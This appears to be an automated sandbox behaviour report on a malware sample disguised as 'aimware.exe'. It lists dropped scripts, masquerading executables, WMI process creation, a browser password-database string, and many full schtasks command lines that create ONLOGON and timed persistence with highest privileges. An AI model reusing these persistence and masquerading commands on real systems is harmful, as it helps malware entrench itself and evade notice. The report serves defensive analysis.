Source: C:\Users\user\Desktop\aimware.exe

Code function: 0_2_00ACA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00ACA6C2

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe

File created: C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe

Jump to behavior

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe

File created: C:\Users\user\Desktop\FRcYkGBu.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Recovery\spoolsv.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1928:120:WilError_03
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-5gR1nc49MRQBmCBSoNRy
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe

File created: C:\Users\user\AppData\Local\Temp\dvzhjsuk

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webFontsession\7uhC6Mx3YQJtIYicktXEMaD7UeOIzINRTf.bat" "

Source: C:\Users\user\Desktop\aimware.exe	Command line argument: sfxname	0_2_00ACDF1E
Source: C:\Users\user\Desktop\aimware.exe	Command line argument: sfxstime	0_2_00ACDF1E
Source: C:\Users\user\Desktop\aimware.exe	Command line argument: STARTDLG	0_2_00ACDF1E

Source: aimware.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: aimware.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\aimware.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\aimware.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CMOXGsTQML.29.dr, rJwLydX4QX.29.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: aimware.exe	ReversingLabs: Detection: 62%
Source: aimware.exe	Virustotal: Detection: 58%

Source: C:\Users\user\Desktop\aimware.exe

File read: C:\Users\user\Desktop\aimware.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\aimware.exe "C:\Users\user\Desktop\aimware.exe"
Source: C:\Users\user\Desktop\aimware.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\webFontsession\ygBm0L4dnhMtPJ5zo9k2Iwhn4.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webFontsession\7uhC6Mx3YQJtIYicktXEMaD7UeOIzINRTf.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe "C:\webFontsession/SurrogatesessionRuntimeBrokerDhcp.exe"
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe'" /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7247.tmp" "c:\Windows\System32\CSCF3A8C87A1D90404F9DF2BA668ED638.TMP"
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\wDyQbcxdSUUjszASb.exe'" /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files (x86)\google\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Recovery\spoolsv.exe'" /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\spoolsv.exe'" /rl HIGHEST /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Recovery\spoolsv.exe'" /rl HIGHEST /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe'" /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe'" /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe'" /rl HIGHEST /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatesessionRuntimeBrokerDhcpS" /sc MINUTE /mo 13 /tr "'C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe'" /f
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatesessionRuntimeBrokerDhcp" /sc ONLOGON /tr "'C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\spoolsv.exe C:\Recovery\spoolsv.exe
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatesessionRuntimeBrokerDhcpS" /sc MINUTE /mo 14 /tr "'C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Recovery\spoolsv.exe C:\Recovery\spoolsv.exe
Source: unknown	Process created: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\n17UfJYjYj.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
Source: unknown	Process created: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
Source: unknown	Process created: C:\Recovery\spoolsv.exe "C:\Recovery\spoolsv.exe"
Source: unknown	Process created: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe "C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
Source: unknown	Process created: C:\Recovery\spoolsv.exe "C:\Recovery\spoolsv.exe"
Source: C:\Users\user\Desktop\aimware.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\webFontsession\ygBm0L4dnhMtPJ5zo9k2Iwhn4.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\webFontsession\7uhC6Mx3YQJtIYicktXEMaD7UeOIzINRTf.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe "C:\webFontsession/SurrogatesessionRuntimeBrokerDhcp.exe"	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline"	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\n17UfJYjYj.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7247.tmp" "c:\Windows\System32\CSCF3A8C87A1D90404F9DF2BA668ED638.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe "C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"

Source: C:\Users\user\Desktop\aimware.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\aimware.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
